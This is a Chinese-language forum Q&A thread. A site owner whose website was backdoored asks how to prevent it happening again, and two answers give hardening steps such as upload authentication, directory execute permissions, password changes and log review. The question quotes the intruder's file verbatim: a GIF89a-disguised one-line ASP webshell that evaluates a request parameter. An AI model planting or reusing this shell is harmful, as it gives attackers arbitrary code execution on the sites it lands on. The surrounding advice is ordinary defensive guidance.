Question

网站被挂马，如何防止再次被挂

我的网站被挂马了，由于第一次遇见此问题，处理得不够及时，整个空间都被传染，非常痛苦。但在无意中发现了黑客注入的文件，竟然是“.asp”的文件，还是在我 保存上传文件 的文件夹下，内容代码是GIF89a888AAAAAAAAAA<%as99AA=REquEst("PA"):EvaL(as99AA)%>8888888888888888888888888888888888888888888888请问我该如何防止此类漏洞，我又该如何来改善（如果有高手看得懂这段代码，麻烦解释一下！）

Answer 1

1、更换空间。（如果你是用虚拟主机的话）你可以在你自己的站上进行一切可能的防马措施，但是你无法阻止跨站入侵以及针对服务器的黑客行为。 关闭FSO、取消整站写权限，修改目录执行权限，更改你在IDC那里的账号密码。up_pic.asp里我没看到你在哪里作了用户是否登陆的检查，不做这个检查岂不是任何人只要访问up_pic.asp这个页面就可以往你的网站上传东西了。

要彻底解决这个问题你需要干以下几件事：
1、修补漏洞
2、清理代码，删除黑客的后门程序及恶意代码，采用这种方法进行攻击的一般都会留下后门方便下次再来，所以能不能彻底清理干净至关重要
3、修改密码，包括后台管理员的密码、数据库密码、Ftp帐户密码、甚至注册会员的密码，如果服务器也是你的甚至还需要修改服务器Windows登录密码，总之所有能通过网络登陆的密码可能都需要修改。
4、如果是使用Access数据库，需要修改Access数据库文件的文件名及目录，不修改这个别人知道了以后可以直接下载你的数据库文件，管理员帐户、注册会员的帐户什么的就全部暴露了
5、限制uploadfiles目录的执行权限，在IIS的uploadfiles目录属性里面把uploadfiles目录的执行权限设置为“无”,这样即便有人能利用上传漏洞往uploadfiles目录上传恶意脚本文件也会因为没有权限无法执行。

Answer 2

核心的操作点在于服务器端以及网站本身的安全设置，其方法包括但不限于以下几种：

1：服务器日志的定期查看，主要看是否有可疑的针对网站页面的访问。

2：通过ftp查看网站文件的修改时间，看时间上是否有异常。

3：核查网站程序是否需要更新，如果有，可第一时间更新到最新版本。

4：如果网站使用了第三方插件，请确认其来源，同时评估这些插件的安全性能。

5：修改建站程序重要的文件名称，修改默认的后台登录地址，防止黑客利用软件自动扫描特定文件以获取相应权限。

6：将ftp，域名，空间，网站后台登录的用户名以及密码设置得尽可能复杂，万不可使用弱口令。

7：选择口碑好，技术强的服务器空间服务商如万网。

8：如有可能，尽可能关闭不需要的端口，限制不必要的上传功能。

9：服务器端设置防火墙等，通常需要与空间服务商沟通，让其代为设置。

建议找专业的安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.

我们需要做的就是让网站自身的安全性更高，防止黑客获取我们网站相关的权限。